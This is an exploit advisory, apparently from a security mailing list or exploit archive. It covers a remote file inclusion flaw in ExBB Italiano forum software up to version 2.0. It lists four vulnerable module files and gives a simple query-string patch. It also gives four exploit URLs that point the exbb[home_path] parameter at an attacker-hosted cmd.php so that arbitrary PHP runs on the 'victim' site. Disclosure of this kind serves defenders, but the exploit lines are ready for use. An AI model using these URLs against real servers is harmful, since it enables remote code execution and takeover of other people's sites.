#
# ExBB Italiano <= 2.0 exbb[home_path] Multiple Remote File Inclusion Exploit
#

#
# General Info:
#
# - Critical Level: Dangerous
# - Version affected: <= 2.0
# - Vendors: exbb.clans.it

#
# Bugged files:
#
# - modules/threadstop/threadstop.php
# - modules/userstop/userstop.php (*)
# - modules/birstday/birst.php
# - modules/newusergreatings/pm_newreg.php

#
# Universal patch to put after starting php brace of every file
#
# if ((stristr($_SERVER['QUERY_STRING'], 'exbb[home_path]'))
# or (stristr($_SERVER['QUERY_STRING'], "exbb['home_path']"))) {
#   die("<center><font face=\"Verdana\" size=\"1\">Patched! Thanks to
#     <a href=\"mailto:lord.flippo@gmail.com\">Flippo</a>.</font></center>
#   ");
# }
#

#
# Exploits
#
# - http://{localhost}/{forum}/modules/threadstop/threadstop.php?new_exbb[home_path]={php_cmd_path}
# - http://{localhost}/{forum}/modules/userstop/userstop.php?exbb[home_path]={php_cmd_path} (*)
# - http://{localhost}/{forum}/modules/newusergreatings/pm_newreg.php?exbb[home_path]={php_cmd_path}
# - http://{localhost}/{forum}/modules/birstday/birst.php?exbb[home_path]={php_cmd_path}
#
# - {localhost} : your victim
# - {forum} : path of ExBB's installation
# - {php_cmd_path} : your cmd.php :P
#

#
# Discovered by Flippo - lord.flippo[at]gmail[dot]com
#

#
# Greetings to:
#
# * all ExBB Italiano Community particulary to SamyWeb
# * #baslug particulary to zeno
# * #hacker.it
# * #sockets particulary to hz
# * and all the others
#

#
# (*) This bug (& so exploit too) was already found by SHiKaA - SHiKaA-[at]hotmail[dot]com
#